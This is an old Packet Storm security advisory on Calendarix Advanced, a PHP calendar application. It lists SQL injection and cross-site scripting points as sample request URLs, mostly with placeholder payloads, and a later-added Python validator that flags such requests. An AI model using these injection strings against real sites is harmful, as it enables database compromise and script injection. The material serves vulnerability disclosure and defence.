calendarix.txt

2005-08-14T00:00:00
ID PACKETSTORM:39367
Type packetstorm
Reporter Dark Bicho
Modified 2005-08-14T00:00:00

Description

/***********************************************  
* Advisory : 01-0005-15  
* Title: multiple vulnerabilities  
* Software: Calendarix Advanced   
* Date: 28. April 2005  
* Web: http://www.calendarix.com/  
************************************************/  
  
  
- Affected software description:  
  
Webcalendar is web software written in PHP and MySQL.  
  
- Exploit:  
  
Include   
  
line 16   
admin/cal_admintop.php:include_once ($calpath."cal_utils.php");  
  
XSS and SQL injection  
  
line 122 - 160  
cal_day.php?op=day&date=2005-05-03&catview=1[sql]/*  
cal_pophols.php?id=999'[sql]/*   
line 23  
calendar.php?op=cal&month=5&year=2'%3Ch1%3DarkBicho005&catview=1  
line 194 - 196  
cal_week.php?op=week&catview= 999'[sql]/*  
line 34 - 39  
cal_cat.php?op=cats&catview=999'[sql]*/  
  
  
- How to fix:  
  
The vendor did not respond.  
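
With no vendor fix listed, one stopgap is to type-check the affected parameters in front of the application, or to run the same check over access logs. The sketch below is an added example, not part of the original advisory or of Calendarix: it covers only the XSS and SQL injection entries, the expected types (integers for catview, id, month and year; YYYY-MM-DD for date) are assumptions inferred from the advisory's sample URLs, and the function names and sample requests are constructed.

```python
import re
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

def _is_int(v):
    # ASCII digits only; no sign, whitespace, quotes or trailing text.
    return re.fullmatch(r"[0-9]{1,6}", v) is not None

def _is_date(v):
    # Strict YYYY-MM-DD that is also a real calendar date.
    try:
        return datetime.strptime(v, "%Y-%m-%d").strftime("%Y-%m-%d") == v
    except ValueError:
        return False

# Script -> {parameter: validator}. Names come from the advisory's URLs;
# the expected types are assumptions, not taken from the Calendarix source.
RULES = {
    "cal_day.php": {"date": _is_date, "catview": _is_int},
    "cal_pophols.php": {"id": _is_int},
    "calendar.php": {"month": _is_int, "year": _is_int, "catview": _is_int},
    "cal_week.php": {"catview": _is_int},
    "cal_cat.php": {"catview": _is_int},
}

def violations(target):
    """Return sorted names of parameters whose decoded value fails its check."""
    parts = urlsplit(target)
    rules = RULES.get(parts.path.rsplit("/", 1)[-1], {})
    bad = set()
    # parse_qsl percent-decodes values and yields every occurrence of a
    # repeated parameter, so a clean first copy cannot hide a bad second one.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        check = rules.get(name)
        if check is not None and not check(value):
            bad.add(name)
    return sorted(bad)

# Constructed sample request targets, built from the strings in the advisory
# (the "[sql]" placeholder is kept as written there) plus one benign request.
SAMPLES = [
    "/cal_day.php?op=day&date=2005-05-03&catview=1[sql]/*",
    "/calendar.php?op=cal&month=5&year=2'%3Ch1%3DarkBicho005&catview=1",
    "/calendar.php?op=cal&month=5&year=2005&catview=1",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(violations(s) or "ok", s)
```

A non-empty result is grounds to reject the request or raise an alert; parameters that are absent are not treated as violations.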
  
- Credits:  
  
DarkBicho  
Email: darkbicho@gmail.com  
Web: http://www.swp-scene.org  
  
  
- Greetings:  
"To my Team SWP"  
"Long live Peru, damn it"  
  
--   
- - - - - - - - - - - - - - - - - - - - - - - - -   
Miguel Sumaran (DarkBicho)  
webpage: http://www.darkbicho.tk/  
Team : http://www.swp-scene.org/  
Made in Peru  
- - - - - - - - - - - - - - - - - - - - - - - - -  